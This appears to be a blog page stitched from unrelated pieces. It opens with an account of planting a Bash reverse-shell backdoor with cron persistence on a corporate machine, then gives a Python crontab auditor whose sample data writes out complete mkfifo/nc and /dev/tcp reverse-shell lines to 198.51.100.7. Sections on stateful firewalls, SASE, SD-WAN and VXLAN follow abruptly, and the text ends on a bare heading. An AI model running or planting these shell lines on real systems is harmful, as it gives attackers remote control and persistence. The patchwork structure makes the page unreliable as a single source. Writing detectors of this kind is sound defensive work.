Bash, short for “Bourne Again SHell,” is a widely used command-line interpreter in Unix-based systems. It provides powerful scripting capabilities, making it a favorite among system administrators and developers. However, this versatility also brings the potential for misuse. This section will explain what a Bash backdoor is and how it functions.

Note:

In the following, I create a backdoor on a corporate machine to maintain persistence within the environment, using a bash one-liner for the shell and a cron job for the system configuration. You will then connect to the created backdoor. The point is to show how tools present on a standard operating system installation can be used to bypass an organization's security controls.

Cron jobs, derived from the word “chronos” meaning time in Greek, are scheduled tasks that run automatically in the background of your server. They follow a specific syntax, using fields to specify when and how often a task should be executed. You can create precise and reliable automated processes by grasping the structure and components of cron jobs.


Analysis: First, rm deletes the file named file if it already exists. Next, mkfifo creates a named pipe (a FIFO) with that name, a new communications channel on the filesystem. The pipe's contents are read into an interactive bash, and everything bash prints, including the results of typed commands, is sent over a network connection to a specific IP address and port; the classic form of this one-liner uses nc for the connection, and whatever the remote side types is written back into the pipe for bash to read. Each | marks the point at which the output of one Linux command is passed as input to the next. With this single line you create a network connection to a specific machine, giving a remote user shell access without installing any extra tooling.

Analysis: First, the existing crontab is listed with its error output discarded, so that a message such as "no crontab for user" is neither printed nor captured. Then the new job line is echoed; in this example, the backdoor bash shell runs every minute. The combined output is piped into crontab -, which installs it as the user's crontab, so the existing entries are preserved and the backdoor entry is appended.
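The defensive counterpart to the two analyses above is an audit of the crontab itself. The following is an added example, not the lab's own script: it parses crontab text into schedule and command fields (the five time fields or an @special string, as described earlier) and flags commands that have the shape of a named-pipe or /dev/tcp reverse shell. The crontab content is constructed for the demonstration and 198.51.100.7 is a documentation (TEST-NET-2) address, not a real command-and-control host.

```python
"""Audit a crontab for reverse-shell style persistence.

Added example for this lab section; not the lab's own script. The crontab
text is constructed, and 198.51.100.7 is a documentation address.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample: two ordinary jobs followed by two entries of the kind the
# lab describes (a named-pipe shell every minute, and a /dev/tcp shell at boot).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
*/15 * * * * /usr/bin/certbot renew --quiet
* * * * * rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 198.51.100.7 4444 >/tmp/f
@reboot bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'
"""

# Command-side indicators; each is a pattern a defender can justify in a rule.
INDICATORS = {
    # mkfifo + a shell + a netcat variant on one line is the named-pipe shell shape
    "named_pipe_shell": re.compile(r"\bmkfifo\b.*\b(?:ba)?sh\b.*\b(?:nc|ncat|netcat)\b"),
    # bash's /dev/tcp pseudo-device opens a socket with no extra tooling installed
    "dev_tcp_shell": re.compile(r"/dev/(?:tcp|udp)/"),
    # an interactive shell has no business in a scheduled job
    "interactive_shell": re.compile(r"\b(?:ba)?sh\s+-i\b"),
    # netcat told to execute a program (-e) is a bind or reverse shell
    "netcat_exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s"),
}

SPECIAL_SCHEDULES = {"@reboot", "@yearly", "@annually", "@monthly",
                     "@weekly", "@daily", "@midnight", "@hourly"}
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


@dataclass
class CronEntry:
    schedule: str          # five time fields, or an @special string
    command: str
    findings: List[str] = field(default_factory=list)


def parse_crontab(text: str) -> List[CronEntry]:
    """Split crontab text into (schedule, command) entries, skipping
    comments, blank lines and VAR=value assignments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) != 2 or parts[0] not in SPECIAL_SCHEDULES:
                continue  # malformed; a stricter auditor might flag this too
            schedule, command = parts
        else:
            parts = line.split(None, 5)  # minute hour dom month dow + command
            if len(parts) != 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append(CronEntry(schedule, command))
    return entries


def audit_crontab(text: str) -> List[CronEntry]:
    """Return only entries whose command matches an indicator. The schedule is
    recorded as context: every-minute and at-boot are the usual choices for a
    persistence job, but on their own they are not evidence."""
    flagged = []
    for entry in parse_crontab(text):
        hits = [name for name, rx in INDICATORS.items() if rx.search(entry.command)]
        if not hits:
            continue
        if entry.schedule == "* * * * *":
            hits.append("schedule:every_minute")
        elif entry.schedule == "@reboot":
            hits.append("schedule:at_boot")
        entry.findings = hits
        flagged.append(entry)
    return flagged


if __name__ == "__main__":
    for e in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{e.schedule}] {e.command}\n    -> {', '.join(e.findings)}")
```

In practice the input comes from `crontab -l -u <user>` for every local account plus the system locations (/etc/crontab, /etc/cron.d/), and the same indicators apply to systemd timers, rc scripts and shell profile files, which are the other places a cron-style backdoor moves to once cron is watched.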

Conclusion: 

Backdoor access refers to a hidden method, intentionally created within a system or software, that allows access or control while bypassing conventional security measures, often undetected.

Backdoors are not only an attacker's tool. Vendors have shipped undocumented maintenance or debugging accounts, and governments have argued for lawful-access mechanisms in the name of monitoring criminal activity or national security. From a security-engineering standpoint these are still backdoors: anyone who discovers the mechanism gets the same access, so they weaken the system for everyone, and forgotten maintenance access is a recurring source of real-world compromise.

Countering backdoors requires controls that look for persistence rather than relying on the perimeter alone: regular audits of cron, systemd, and other startup locations; file-integrity monitoring; egress filtering and alerting on unexpected outbound connections (a reverse shell is, by definition, outbound); and routine vulnerability assessments. Fostering a security-conscious culture among users and promoting awareness of potential risks strengthens overall cybersecurity.

Video: Stateful Inspection Firewall

We know we have a set of well-defined protocols that are used to communicate over our networks. Let’s call these communication rules. You are probably familiar with the low-layer transport protocols, such as TCP and UDP, and higher application layer protocols, such as HTTP and FTP.

Generally, we interact directly with the application layer and have networking and security devices working at the lower layers. So when Host A wants to talk to Host B, it will go through a series of communication layers with devices working at each layer. A device that works at one of these layers is a stateful firewall.
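To make the idea concrete, here is an added example (not code from the page or from any vendor product) of the connection table a stateful inspection firewall keeps for TCP. An inside host may open connections outward; an outside packet is accepted only if it matches a connection the firewall saw being opened, and the table follows the handshake and teardown. The inside network prefix (10.0.0.0/24) and the packet trace are assumptions constructed for the demonstration.

```python
"""Minimal stateful-inspection firewall for TCP. Added example; the inside
prefix and the packet trace are constructed for the demonstration."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


def default_is_inside(ip: str) -> bool:
    return ip.startswith("10.0.0.")       # assumption: 10.0.0.0/24 is "inside"


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str  # TCP flag letters, e.g. "S", "SA", "A", "FA", "R"


FlowKey = Tuple[str, int, str, int]  # (inside_ip, inside_port, outside_ip, outside_port)


class StatefulFirewall:
    """Inside hosts may open connections outward; an outside segment is accepted
    only if it belongs to a connection this firewall saw being opened. Contrast a
    stateless ACL that permits any inbound segment with the ACK bit set."""

    def __init__(self, is_inside: Callable[[str], bool] = default_is_inside):
        self.is_inside = is_inside
        self.table: Dict[FlowKey, str] = {}
        self.log: List[Tuple[Packet, str, str]] = []

    def _flow(self, p: Packet) -> Tuple[FlowKey, str]:
        """Normalise both directions of a flow onto one table key."""
        if self.is_inside(p.src):
            return (p.src, p.sport, p.dst, p.dport), "out"
        return (p.dst, p.dport, p.src, p.sport), "in"

    def _verdict(self, p: Packet, verdict: str, why: str) -> str:
        self.log.append((p, verdict, why))
        return verdict

    def process(self, p: Packet) -> str:
        key, direction = self._flow(p)
        state = self.table.get(key)
        if "R" in p.flags:                       # RST tears down a known flow only
            if state is None:
                return self._verdict(p, "DROP", "RST for unknown flow")
            del self.table[key]
            return self._verdict(p, "ACCEPT", "RST closes flow")
        if state is None:                         # no entry: only an outbound SYN may create one
            if direction == "out" and p.flags == "S":
                self.table[key] = "SYN_SENT"
                return self._verdict(p, "ACCEPT", "new outbound connection")
            return self._verdict(p, "DROP", "no matching state")
        if state == "SYN_SENT":
            if direction == "in" and p.flags == "SA":
                self.table[key] = "SYN_RECV"
                return self._verdict(p, "ACCEPT", "SYN-ACK for our SYN")
            if direction == "out" and p.flags == "S":
                return self._verdict(p, "ACCEPT", "SYN retransmit")
            return self._verdict(p, "DROP", "unexpected segment in SYN_SENT")
        if state == "SYN_RECV":
            if direction == "out" and p.flags == "A":
                self.table[key] = "ESTABLISHED"
                return self._verdict(p, "ACCEPT", "handshake complete")
            return self._verdict(p, "DROP", "unexpected segment in SYN_RECV")
        # ESTABLISHED or FIN_WAIT: the segment belongs to a tracked connection.
        if "F" in p.flags:
            if state == "ESTABLISHED":
                self.table[key] = "FIN_WAIT"      # one side has closed
            else:
                del self.table[key]              # second FIN: flow is gone (real stacks
            return self._verdict(p, "ACCEPT", "FIN on tracked flow")  # keep a TIME_WAIT)
        return self._verdict(p, "ACCEPT", f"matches {state} flow")


def demo_trace() -> List[str]:
    """Constructed trace: one legitimate outbound HTTPS session plus three probes
    from a host nobody inside talked to. Returns the verdicts in order."""
    fw = StatefulFirewall()
    inside, server, scanner = "10.0.0.5", "203.0.113.10", "203.0.113.99"
    trace = [
        Packet(inside, 51000, server, 443, "S"),     # client SYN
        Packet(server, 443, inside, 51000, "SA"),    # server SYN-ACK
        Packet(inside, 51000, server, 443, "A"),     # client ACK
        Packet(server, 443, inside, 51000, "A"),     # server data
        Packet(scanner, 40000, inside, 22, "S"),     # unsolicited SYN
        Packet(scanner, 40000, inside, 22, "A"),     # ACK scan
        Packet(scanner, 40000, inside, 22, "SA"),    # forged SYN-ACK
        Packet(server, 443, inside, 51000, "FA"),    # server closes
        Packet(inside, 51000, server, 443, "FA"),    # client closes
        Packet(server, 443, inside, 51000, "A"),     # late segment: no state left
    ]
    return [fw.process(p) for p in trace]


if __name__ == "__main__":
    for verdict in demo_trace():
        print(verdict)
```

The three probe packets are the point: a stateless "permit established" rule that only tests the ACK bit would pass the ACK scan and the forged SYN-ACK, whereas the connection table rejects anything it did not see opened from the inside. Real implementations add timers (idle and TIME_WAIT), sequence-number window checks and UDP/ICMP pseudo-state on top of this skeleton.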


MPLS and SD-WAN

MPLS does not protect the resources and users, certainly not those connected to the Internet. On the other hand, SD-WAN service offerings are not all created equal since many do not include firewall/security features for threat protection to protect all edges – mobile devices, sites, and cloud resources. This lack of integrated security complicates SD-WAN deployments. Also, this often leads to Malware getting past the perimeter unnoticed.

The cost involved

Security solutions are expensive, and pricing is rarely fixed. Some vendors charge on usage-based models for quantities you do not yet know, which makes planning extremely problematic and complex. As costs keep increasing, security professionals often end up trading off point solutions on cost grounds, which is not an effective risk-management strategy.

Security controls for mobile users are also limited when they rely on traditional mobile VPN solutions. More often than not, VPN access is coarse, forcing IT to open access to all network resources once a user is connected. Protecting mobile users then requires additional tools such as next-generation firewalls (NGFWs), so again we have another point solution. In addition, mobile VPN solutions provide no last- or middle-mile optimization.

SASE Meaning: How SASE solves this

SASE converges a complete security stack into the network, allowing SASE to bring granular control to sites and mobile and cloud resources. This is done by enforcing zero-trust principles for all edges. SASE provides anti-malware protection for both WAN and Internet traffic. In addition, for malware detection and prevention, SASE can offer signature-based and machine-learning-based protection, consisting of several integrated anti-malware engines.

For malware communication, SASE can stop the outbound traffic to C&C servers based on reputation feeds and network behavioral analysis. Mobile user traffic is fully protected by SASE’s advanced security services, including NGFW, secure web gateway (SWG), threat prevention, and managed threat detection and response.

Furthermore, in the case of mobile, SASE mobile users can dynamically connect to the closest SASE PoP regardless of the location. Again, as discussed previously, the SASE cloud’s relevant optimizations are available for mobile users.

Rethink the WAN

The shift to the cloud, edge computing, and mobility offer new opportunities for IT professionals. To support these digital initiatives, the network professionals must rethink their approach to the WAN transformation. WAN transformation is not just about replacing MPLS with SD-WAN. It needs an all-encompassing solution that provides the proper network performance and security level for enhanced site-to-site connectivity, security, mobile, and cloud.

Diagram: SASE, a network security solution.

SASE Meaning: SASE wraps up

SASE is a network and security architecture consolidating numerous network and security functions, traditionally delivered as siloed point solutions, into an integrated cloud service. It combines several network and security capabilities along with cloud-native security functions. The functions are delivered from the cloud by the SASE vendor.

They are essentially providing a consolidated, platform-based approach to security. We have a cloud-delivered solution consolidating multiple edge network security controls and network services into a unified solution with centralized management and distributed enforcement.

The appliance-based perimeter

Even though there has been a shift to the cloud, the traditional perimeter network security solution has remained appliance-based. The case for moving security controls to the cloud is better protection and performance, plus ease of deployment and maintenance.

The performance penalty of earlier cloud-delivered solutions has largely been overcome with optimized routing and a global PoP footprint. However, opinion is still split on performance and protection: many consider them prime reasons to keep network security solutions on-premises.

Key Components of SASE

The key components of SASE include software-defined wide-area networking (SD-WAN), cloud-native secure web gateways (SWG), zero-trust network access (ZTNA), firewall-as-a-service (FWaaS), and data loss prevention (DLP), among others. These components work harmoniously to provide organizations with a holistic and scalable solution for secure network connectivity, regardless of the location or device used by the end-user.

Benefits of SASE

SASE offers numerous benefits for organizations seeking to enhance their network infrastructure and security posture. Firstly, it provides simplified network management by consolidating various functions into a unified platform. Secondly, it offers an improved user experience through optimized connectivity and reduced latency. Additionally, SASE enables organizations to embrace cloud services securely and facilitates seamless scalability to adapt to changing business demands.

Implications for the Future

As businesses embrace digital transformation and remote work becomes more prevalent, the demand for flexible and secure network architectures like SASE is expected to skyrocket. SASE empowers organizations to overcome the limitations of traditional network setups and enables them to thrive in an increasingly dynamic and interconnected world. With its cloud-native approach and emphasis on security, SASE is poised to redefine how networks are designed and managed in the coming years.




Key SASE Definition Summary Points:

Main Checklist Points To Consider

  • The rise of SASE and the causes of digital transformation.

  • Technical details on the issues of MPLS with the lack of agility. 

  • Technical details on the SASE PoP and the converging of networking and security to a SaaS solution.

  • Discuss the numerous challenges of managing the network and how SASE solves this.

  • A final note on the appliance-based perimeter.

 

Summary: SASE Definition

With the ever-evolving landscape of technology and the increasing demand for secure and efficient networks, a new paradigm has emerged in the realm of network security – SASE, which stands for Secure Access Service Edge. In this blog post, we delved into the definition of SASE, its key components, and its transformative impact on network security.

Section 1: Understanding SASE

SASE, pronounced “sassy,” is a comprehensive framework that combines network security and wide area networking (WAN) capabilities into a single cloud-based service model. It aims to provide users with secure access to applications and data, regardless of their location or the devices they use. By converging networking and security functions, SASE simplifies the network architecture and enhances overall performance.

Section 2: The Key Components of SASE

To fully grasp the essence of SASE, it is essential to explore its core components. These include:

1. Secure Web Gateway (SWG): The SWG component of SASE ensures safe web browsing by inspecting and filtering web traffic, protecting users from malicious websites, and enforcing internet usage policies.

2. Cloud Access Security Broker (CASB): CASB provides visibility and control over data as it moves between the organization’s network and multiple cloud platforms. It safeguards against cloud-specific threats and helps enforce data loss prevention policies.

3. Firewall-as-a-Service (FWaaS): FWaaS offers scalable and flexible firewall protection, eliminating the need for traditional hardware-based firewalls. It enforces security policies and controls access to applications and data, regardless of their location.

4. Zero Trust Network Access (ZTNA): ZTNA ensures that users and devices are continuously authenticated and authorized before accessing resources. It replaces traditional VPNs with more granular and context-aware access policies, reducing the risk of unauthorized access.

Section 3: The Benefits of SASE

SASE brings numerous advantages to organizations seeking enhanced network security and performance:

1. Simplified Architecture: By consolidating various network and security functions, SASE eliminates the need for multiple point solutions, reducing complexity and management overhead.

2. Enhanced Security: With its comprehensive approach, SASE provides robust protection against emerging threats, ensuring data confidentiality and integrity across the network.

3. Improved User Experience: SASE enables secure access to applications and data from any location, offering a seamless user experience without compromising security.

Conclusion:

In conclusion, SASE represents a paradigm shift in network security, revolutionizing how organizations approach their network architecture. By converging security and networking functions, SASE provides a comprehensive and scalable solution that addresses the evolving challenges of today’s digital landscape. Embracing SASE empowers organizations to navigate the complexities of network security and embrace a future-ready approach.

SD WAN Overlay


In today's digital age, businesses rely on seamless and secure network connectivity to support their operations. Traditional Wide Area Network (WAN) architectures often struggle to meet the demands of modern companies due to their limited bandwidth, high costs, and lack of flexibility. A revolutionary SD-WAN (Software-Defined Wide Area Network) overlay has emerged to address these challenges, offering businesses a more efficient and agile network solution.

This blog post will delve into SD-WAN overlay, exploring its benefits, implementation, and potential to transform how businesses connect.

SD-WAN overlay is a network architecture that enhances traditional WAN infrastructure by leveraging software-defined networking (SDN) principles. Unlike traditional WAN, where network management is done manually and requires substantial hardware investments, SD-WAN overlay centralizes network control and management through software. This enables businesses to simplify network operations and reduce costs by utilizing commodity internet connections alongside existing MPLS networks.

SD-WAN, or Software-Defined Wide Area Network, is a technology that simplifies the management and operation of a wide area network. It abstracts the underlying network infrastructure and provides a centralized control plane for configuring and managing network services. SD-WAN overlay takes this concept further by introducing an additional layer of virtualization, enabling the creation of multiple logical networks on top of the physical network infrastructure.

Table of Contents

Highlights: SD WAN Overlay

SD WAN

SD WAN Overlay

Overlay Types

  • Tunnel-Based Overlays

  • Segment-Based Overlays

  • Policy-Based Overlays

  • Internet-Based SD-WAN Overlay

  • Hybrid Overlays

  • Cloud-Enabled Overlays

  • MPLS-Based SD-WAN Overlay

  • Hybrid SD-WAN Overlay

So, what exactly is an SD-WAN overlay?

In simple terms, it is a virtual layer added to the existing network infrastructure. These network overlays connect different locations, such as branch offices, data centers, and the cloud, by creating a secure and reliable network.

1. Tunnel-Based Overlays:

One of the most common types of SD-WAN overlays is tunnel-based overlays. This approach encapsulates network traffic within a virtual tunnel, allowing it to traverse multiple networks. Tunnel-based overlays are typically built with GRE (Generic Routing Encapsulation) or IPsec. GRE on its own only encapsulates; it provides no confidentiality or integrity, so encryption and authentication come from IPsec, either directly or as GRE over IPsec. A properly keyed IPsec tunnel gives a protected, reliable connection between the SD-WAN edge devices.

2. Segment-Based Overlays:

Segment-based overlays are designed to segment the network traffic based on specific criteria such as application type, user group, or location. This allows organizations to prioritize critical applications and allocate network resources accordingly. By segmenting the traffic, SD-WAN can optimize the performance of each application and ensure a consistent user experience. Segment-based overlays are particularly beneficial for businesses with diverse network requirements.

3. Policy-Based Overlays:

Policy-based overlays enable organizations to define rules and policies that govern the behavior of the SD-WAN network. These overlays use intelligent routing algorithms to dynamically select the most optimal path for network traffic based on predefined policies. By leveraging policy-based overlays, businesses can ensure efficient utilization of network resources, minimize latency, and improve overall network performance.

4. Hybrid Overlays:

Hybrid overlays combine the benefits of both public and private networks. This overlay allows organizations to utilize multiple network connections, including MPLS, broadband, and LTE, to create a robust and resilient network infrastructure. Hybrid overlays intelligently route traffic through the most suitable connection based on application requirements, network availability, and cost. By leveraging hybrid overlays, businesses can achieve high availability, cost-effectiveness, and improved application performance.
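The path-selection logic that both policy-based overlays (item 3) and hybrid overlays (item 4) rely on is small enough to show in full. The following is an added example, not taken from any vendor's implementation: each application class carries SLA thresholds and a transport preference list, each transport carries measured latency, jitter and loss, and the selector honours the preference list while the SLA holds, falls back to any in-SLA path (cheapest first), and degrades to the least-bad live path during a brownout. The transports, thresholds and measurements are constructed for the demonstration.

```python
"""Policy-based path selection for an SD-WAN overlay. Added example; the
transports, SLA thresholds and measured values are constructed."""
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple


@dataclass
class PathStats:
    name: str
    latency_ms: float
    jitter_ms: float
    loss_pct: float
    cost_per_gb: float    # relative cost; breaks ties between in-SLA paths
    up: bool = True


@dataclass
class AppPolicy:
    name: str
    max_latency_ms: float
    max_jitter_ms: float
    max_loss_pct: float
    preferred: Sequence[str]   # transports in order of preference


def meets_sla(path: PathStats, pol: AppPolicy) -> bool:
    return (path.up and path.latency_ms <= pol.max_latency_ms
            and path.jitter_ms <= pol.max_jitter_ms
            and path.loss_pct <= pol.max_loss_pct)


def select_path(paths: List[PathStats], pol: AppPolicy) -> Tuple[Optional[str], str]:
    """Return (transport, reason). Decision order: the policy's preference list
    while the SLA holds; otherwise any in-SLA path, cheapest first; otherwise the
    least-bad live path (brownout); otherwise nothing."""
    by_name = {p.name: p for p in paths}
    for name in pol.preferred:
        p = by_name.get(name)
        if p is not None and meets_sla(p, pol):
            return p.name, "preferred-in-sla"
    in_sla = sorted((p for p in paths if meets_sla(p, pol)), key=lambda p: p.cost_per_gb)
    if in_sla:
        return in_sla[0].name, "fallback-in-sla"
    live = [p for p in paths if p.up]
    if not live:
        return None, "no-path"
    # Brownout score: loss hurts real-time traffic most, then jitter, then latency.
    least_bad = min(live, key=lambda p: p.loss_pct * 10 + p.jitter_ms + p.latency_ms / 10)
    return least_bad.name, "best-effort"


# Constructed policies: voice is strict and prefers the private circuit; bulk
# backup is tolerant and prefers the cheap transport.
VOICE = AppPolicy("voice", max_latency_ms=150, max_jitter_ms=30, max_loss_pct=1.0,
                  preferred=("mpls", "broadband", "lte"))
BACKUP = AppPolicy("backup", max_latency_ms=500, max_jitter_ms=100, max_loss_pct=5.0,
                   preferred=("broadband", "lte", "mpls"))


def healthy_paths() -> List[PathStats]:
    return [PathStats("mpls", 40, 2, 0.0, 8.0),
            PathStats("broadband", 60, 15, 0.8, 0.5),
            PathStats("lte", 90, 30, 2.0, 4.0)]


def degraded_paths() -> List[PathStats]:
    # MPLS circuit down and broadband at 3% loss: voice has no in-SLA path left.
    return [PathStats("mpls", 40, 2, 0.0, 8.0, up=False),
            PathStats("broadband", 60, 15, 3.0, 0.5),
            PathStats("lte", 90, 30, 2.0, 4.0)]


if __name__ == "__main__":
    for label, paths in (("healthy", healthy_paths()), ("degraded", degraded_paths())):
        for pol in (VOICE, BACKUP):
            print(label, pol.name, select_path(paths, pol))
```

In a real edge the measurements come from continuous probes on each tunnel and the decision is re-evaluated per flow (not per packet) with hysteresis, so that a transport hovering around a threshold does not cause constant flapping; the same structure also lets you express "never put this application class on the public Internet" simply by leaving that transport out of the preference list and out of the fallback set.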

5. Cloud-Enabled Overlays:

As more businesses adopt cloud-based applications and services, seamless connectivity to cloud environments becomes crucial. Cloud-enabled overlays provide direct and secure connectivity between the SD-WAN network and cloud service providers. These overlays ensure optimized performance for cloud applications by minimizing latency and providing efficient data transfer. Cloud-enabled overlays simplify the management and deployment of SD-WAN in multi-cloud environments, making them an ideal choice for businesses embracing cloud technologies.

Related: For additional pre-information, you may find the following helpful:

  1. Transport SDN
  2. SD WAN Diagram 
  3. Overlay Virtual Networking



SD-WAN Overlay

Key SD WAN Overlay Discussion Points:


  • WAN transformation.

  • The issues with traditional networking.

  • Introduction to Virtual WANs.

  • SD-WAN and SDN discussion.

  • SD-WAN overlay core features.

  • Drivers for SD-WAN.

 

Back to Basics: SD-WAN Overlay

Overlay Networking

Overlay networking is an approach to computer networking that involves building a layer of virtual networks on top of an existing physical network. This approach improves the scalability, performance, and security of the underlying infrastructure. It also allows for creating virtual networks that span multiple physical networks, allowing for greater flexibility in traffic routes.

At the core of overlay networking is the concept of virtualization. This involves separating the physical infrastructure from the virtual networks, allowing greater control over allocating resources. This separation also allows the creation of virtual network segments that span multiple physical networks. This provides an efficient way to route traffic, as well as the ability to provide additional security and privacy measures.

The diagram below displays a VXLAN overlay. VXLAN creates the tunnel that extends Layer 2 across a Layer 3 core.

Diagram: Overlay Networking with VXLAN
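The VXLAN header behind that diagram is eight bytes, and seeing it built and parsed makes the security point of overlays obvious: the 24-bit VNI is the only thing separating one tenant's Layer 2 segment from another's, and the header carries no authentication. The code below is an added example (not from the page or any VXLAN implementation) that encodes and decodes the header per RFC 7348 and enforces a per-VTEP VNI allow-list on receipt; the MAC addresses, VTEP addresses and VNI numbers are constructed for the demonstration.

```python
"""Build and parse the VXLAN header and enforce a per-VTEP VNI allow-list.
Added example; MACs, VTEP addresses and VNIs are constructed."""
import struct
from typing import Dict, List, Set, Tuple

VXLAN_UDP_PORT = 4789      # IANA-assigned destination port (RFC 7348)
FLAG_VNI_VALID = 0x08      # the "I" bit: the VNI field is valid
HEADER_LEN = 8


def encode_vxlan(vni: int, inner_frame: bytes) -> bytes:
    """8-byte header: flags(8) | reserved(24) | VNI(24) | reserved(8), followed by
    the inner Ethernet frame. This is the UDP payload; IP/UDP are the underlay's."""
    if not 0 <= vni < (1 << 24):
        raise ValueError("VNI must fit in 24 bits")
    return struct.pack("!B3xI", FLAG_VNI_VALID, vni << 8) + inner_frame


def decode_vxlan(payload: bytes) -> Tuple[int, bytes]:
    """Return (vni, inner_frame). RFC 7348 says reserved bits are ignored on
    receipt, but a header without the I bit carries no usable VNI and is dropped."""
    if len(payload) < HEADER_LEN + 14:   # header plus at least an Ethernet header
        raise ValueError("truncated VXLAN datagram")
    flags, vni_field = struct.unpack("!B3xI", payload[:HEADER_LEN])
    if not flags & FLAG_VNI_VALID:
        raise ValueError("I flag clear: no valid VNI")
    return vni_field >> 8, payload[HEADER_LEN:]


def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def inner_summary(frame: bytes) -> Tuple[str, str, int]:
    """Destination MAC, source MAC and EtherType of the encapsulated frame."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    return mac(frame[:6]), mac(frame[6:12]), ethertype


class VtepIngressPolicy:
    """VXLAN has no authentication: the VNI is the only tenant separator, so a
    receiving VTEP should accept from each peer only the VNIs that peer may
    source. Anything else is a cross-tenant injection, silently, unless checked."""

    def __init__(self, allowed: Dict[str, Set[int]]):
        self.allowed = allowed   # source VTEP address -> permitted VNIs

    def receive(self, src_vtep: str, payload: bytes) -> Tuple[str, int, bytes]:
        vni, inner = decode_vxlan(payload)
        if vni not in self.allowed.get(src_vtep, set()):
            return "DROP", vni, inner
        return "ACCEPT", vni, inner


# Constructed inner frame: dst MAC, src MAC, EtherType 0x0800 (IPv4), dummy payload.
SAMPLE_FRAME = (bytes.fromhex("02000000aa01") + bytes.fromhex("02000000bb02")
                + b"\x08\x00" + b"\x45" + b"\x00" * 19)


def demo() -> List[str]:
    """VTEP 192.0.2.2 may source VNI 5001 only; it tries 5001 and then 5002."""
    policy = VtepIngressPolicy({"192.0.2.1": {5001, 5002}, "192.0.2.2": {5001}})
    ok = policy.receive("192.0.2.2", encode_vxlan(5001, SAMPLE_FRAME))
    bad = policy.receive("192.0.2.2", encode_vxlan(5002, SAMPLE_FRAME))
    return [ok[0], bad[0]]


if __name__ == "__main__":
    pkt = encode_vxlan(5001, SAMPLE_FRAME)
    vni, inner = decode_vxlan(pkt)
    print(vni, inner_summary(inner), demo())
```

The allow-list is the software equivalent of what a production fabric does with the underlay: VXLAN traffic should only be accepted on UDP/4789 from known VTEP addresses, and if the underlay is not trusted the VXLAN datagrams themselves go inside IPsec, because nothing in the header above stops a host on the underlay from forging a VNI.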

Underlay network

A network underlay is a physical infrastructure that provides the foundation for a network overlay, a logical abstraction of the underlying physical network. The network underlay provides the physical transport of data between nodes, while the overlay provides logical connectivity.

The network underlay can comprise various technologies, such as Ethernet, Wi-Fi, cellular, satellite, and fiber optics. It is the foundation of a network overlay and essential for the proper functioning of the network. It provides the transport of data and the physical connections between nodes. It also provides the physical elements that make up the infrastructure, such as routers, switches, and firewalls.

Diagram: Overlay networking. Source Researchgate.

SD-WAN with SDWAN overlay.

SD-WAN leverages a transport-independent fabric technology that is used to connect remote locations. This is achieved by using overlay technology. The SDWAN overlay works by tunneling traffic over any transport between destinations within the WAN environment.

This gives authentic flexibility to routing applications across any network portion regardless of the circuit or transport type. This is the definition of transport independence. Having a fabric SDWAN overlay network means that every remote site, regardless of physical or logical separation, is always a single hop away from another.

SD-WAN overlays offer several advantages over traditional WANs, including improved scalability, reduced complexity, and better control over traffic flows. They can also improve security, since the overlay tunnels between sites are typically encrypted with IPsec and traffic can be segmented per application or tenant. Additionally, SD-WAN overlays can improve application performance and reliability and reduce latency.

We need more bandwidth.

Modern businesses demand more bandwidth than ever to connect their data, applications, and services. As a result, we have many things to consider with the WAN, such as regulations, security, visibility, branch and data center sites, remote workers, Internet access, cloud, and traffic prioritization. These requirements are driving the need for SD-WAN.

The concepts and design principles of creating a wide area network (WAN) to provide resilient and optimal transit between endpoints have continuously evolved. However, the driver behind building a better WAN is to support applications that demand performance and resiliency.

Key SD-WAN Features

  • Full stack observability

  • Not all traffic treated equally

  • Combining all transports

  • Intelligent traffic steering

  • Controller-based policy

Benefits of SD-WAN Overlay

Enhanced Performance: SD-WAN overlay leverages intelligent traffic routing algorithms and dynamic path selection to optimize network performance. It ensures critical applications receive the necessary bandwidth and prioritization, improving performance and user experience.

Increased Security: With the rise in cyber threats, security is a top concern for businesses. SD-WAN overlay provides enhanced security measures, including integrated firewall capabilities, secure VPN tunnels, and traffic segmentation. These features help protect sensitive data and prevent unauthorized access, ensuring a robust and secure network infrastructure.

Agility and Scalability: Traditional networks often struggle to adapt to changing business needs and scale effectively. SD-WAN overlay offers agility and scalability by enabling rapid deployment of new sites, simplifying network management, and providing flexibility in bandwidth allocation. It empowers businesses to scale their network infrastructure effortlessly as their requirements evolve.

Implementation Considerations

Network Assessment: A thorough network assessment is crucial before implementing the SD-WAN overlay. This includes evaluating existing network infrastructure, bandwidth requirements, application performance, and security protocols. A comprehensive assessment helps identify potential bottlenecks and ensures a smooth transition to the new technology.

Vendor Selection: Choosing the right SD-WAN overlay vendor is vital for a successful implementation. Factors to consider include scalability, security features, ease of management, and compatibility with existing network infrastructure. Evaluating multiple vendors and seeking recommendations from industry experts can help make an informed decision.

WAN Innovation

The WAN is the entry point between inside the perimeter and outside. An outage in the WAN has a large blast radius, affecting many applications and other branch site connectivity. Yet the WAN has had little innovation until now with the advent of both SD-WAN and SASE.  SASE is a combination of both network and security functions.

If you look at the history of the WAN, you will see several stages of WAN virtualization. Most WAN transformation projects went from basic hub-and-spoke topologies built on services such as leased lines to fully meshed MPLS-based WAN services. Cost was the main driver for this evolution, not agility.

Diagram: Wide Area Network: WAN Technologies.

Issues with the Traditional Network

As the world of I.T. becomes dispersed, the network and security perimeters dissolve and become less predictable. Before, it was easy to know what was internal and external, but now we live in a world of micro-perimeters with a considerable change in the focal point.

The perimeter is now the identity of the user and device – not the fixed point at an H.Q. site. As a result, applications require a WAN to support distributed environments, flexible network points, and a change in the perimeter design.

Suboptimal traffic flow

